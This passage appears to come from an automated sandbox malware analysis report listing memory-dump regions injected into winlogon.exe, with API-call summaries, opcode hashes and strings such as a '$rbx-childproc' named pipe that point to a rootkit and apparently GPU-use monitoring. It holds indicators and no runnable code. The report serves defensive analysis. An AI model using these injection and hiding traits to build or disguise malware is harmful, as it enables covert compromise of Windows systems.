                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Running Time
                                  • API String ID: 1943346504-1805530042
                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction ID: 6d877cb771b030e8c1848604b949f914fa886ad881ce973f6351e4596f79cd78
                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction Fuzzy Hash: EA31F726740AD296F721CF1BE84C769A3A0F788BC5F46052FDE4D43626DF38C4958B60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                  • API String ID: 1943346504-3507739905
                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction ID: 2938c9b5367e3a30d3c493196a5ea509272ea85c73a4f5af7e66454cd259fcb7
                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction Fuzzy Hash: DA314F31750B828AE754DF23E84C759A3A1B784FD9F56512A9E4A83736DF38C4858B20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                  • API String ID: 1943346504-3507739905
                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction ID: cc36a7bef3ff805c54552ed455780306df8aa7386e69bc5b06a84e5bafd0a384
                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction Fuzzy Hash: 04316F21790B928AFB10DF27E88875A63A1B784F95F56412B9E4A43726DF38C485CA30
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction ID: 31dcd79f82258995a298855edb0e21b69cf79c23839cb83368602f13019457d8
                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction Fuzzy Hash: 53D1C0326417D286EB20DF66D4883AD37A0F785798F19091BEE8957B9BDB34C1D2CB10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction ID: 45e1e8c4ca54d2253de5b2a904fd7511cf2d65945c76210a78027f5116f86b72
                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction Fuzzy Hash: 41D1A2326447C28AEB60DF66D4483AD77A0F785788F12112AEE8957B97DB34C5C1CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction ID: 4e75c92e81f4563eef9d1b397e148fa82025b54b23607dab791906ef881fbefc
                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction Fuzzy Hash: F4D18B326447C28AFB20DB66D4883AD77A0F785798F12115BEE8957B9BDB34C4D1CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                  • String ID: d
                                  • API String ID: 3743429067-2564639436
                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction ID: 2ef39016253745e3f5bde985a3b39585cad1a0ddd418d86485644daa4de0206e
                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction Fuzzy Hash: A9417033214BC5DAE760CF62E44839E77A1F388B99F45812ADA8A47758DF38C485CB51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                  • String ID: d
                                  • API String ID: 3743429067-2564639436
                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction ID: abaf1c961283f1002ba49dcbb640215d6ad11cc3311b88137e00c21535f04237
                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction Fuzzy Hash: FD417273654BC5DAE760CF22E44839E77A1F388B99F45812ADB8A07758DF38C489CB50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                  • String ID: \\.\pipe\$rbx-childproc
                                  • API String ID: 166002920-1828357524
                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction ID: d68a32ee89cd1ef34b28f1b566192036f77d526cef49238af14684e985acd6d2
                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction Fuzzy Hash: 09114C32658B8183E7108B22F55C35A7760F389BD4F94031AEA5A42AA9CF3CC184CF51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                  • String ID: \\.\pipe\$rbx-childproc
                                  • API String ID: 166002920-1828357524
                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction ID: 90b05e58fa747e168dea5d36b9fe3817fb4cea3a82530d062ea3a975dfc6d1ff
                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction Fuzzy Hash: 32115E32654B9183F710CB26F45835A7760F389BD5F94431AEA5A02BA9CF3CC199CF50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: 42c5ddc62fc77b12195c3f3aa7af662906c00236da021469be3772891c23dbde
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 618118206822C366FB559B27EA4E35922D1BBA6780F57481F9D0547397DB38C9C78F30
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: f755b599eafec87e59c1b07fc74af36fcb5151bd0050eeaac81e485eec3279b5
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: D381C1216803C396FB50AB67D84D36966D1BB85BC4F96411FAA0987797DB38C9C28F30
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: cabc3fd86156c929d50b91b23d4def9da1412572f6ad8938f72a8133ca96ee76
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: FD81C5216802C396FB50DF67D4CD3696391BB85784F56419FA90A47397DB38C8C68F30
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759B31
                                  • GetLastError.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759B3F
                                  • LoadLibraryExW.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759B69
                                  • FreeLibrary.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759BD7
                                  • GetProcAddress.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759BE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction ID: 9b440b0885f9b3ad556a81275d224371b709ec613feb471ed359084364e2e270
                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction Fuzzy Hash: 3031B221352782D1FE529B17E8087A52394FB45BA0F9B062EED1D47792EF38C4C4CB20
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789B31
                                  • GetLastError.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789B3F
                                  • LoadLibraryExW.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789B69
                                  • FreeLibrary.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789BD7
                                  • GetProcAddress.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789BE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction ID: 6af6a93ee8eec3dc25594ae07b6be75bf9bfa43540248ea916cabbb8063bfeb8
                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction Fuzzy Hash: 1E31C5213526C191FE119B17D8887A52794BB84BA0F9B066FEE1D47796EF38C4C4CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction ID: 703b6713f1a341c0f0c07990f0257e272ea4544b404d549734add5d4a6cd9f33
                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction Fuzzy Hash: F311BF31354B8186E7508B57E85C719A7A4F388FE4F42022AEA5EC7B95CF38C9848B61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction ID: 45f37a940c6f6ae4d728d83367e7b703058e4ea08d5f0a378ceb77f0f5652328
                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction Fuzzy Hash: 2111B231350B9182E7508B67E85871967A0F388FE5F42021AEA5E87BA5CF39C5988B50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Thread$Current$Context
                                  • String ID:
                                  • API String ID: 1666949209-0
                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction ID: fa228f4d49158893196ad5a10421384f173f9a835f4a2159c381d42f7cda90a8
                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction Fuzzy Hash: B9D19D36244BC991EA70DB0AE49835A77A0F388B88F51055BEA8D4776ADF3DC591CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Free$CurrentThread
                                  • String ID:
                                  • API String ID: 564911740-0
                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction ID: 3534688ffde7270efffbe7f824817acf2eb317f5c95840e9515998278616db7a
                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction Fuzzy Hash: C451E834281BC7D6EF05DB26E85829833A5FB08784F86481FA52D067A7EF74D598CB60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Free$CurrentThread
                                  • String ID:
                                  • API String ID: 564911740-0
                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction ID: 1e8877812eea2f52ff55e63e4975e2e56b8d3ccfe0ccb90a90a81bb723049eab
                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction Fuzzy Hash: C3510734281BC795FB05DB2AECD829423A1FB08745F82485FA52D067A7EF38C598CB60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
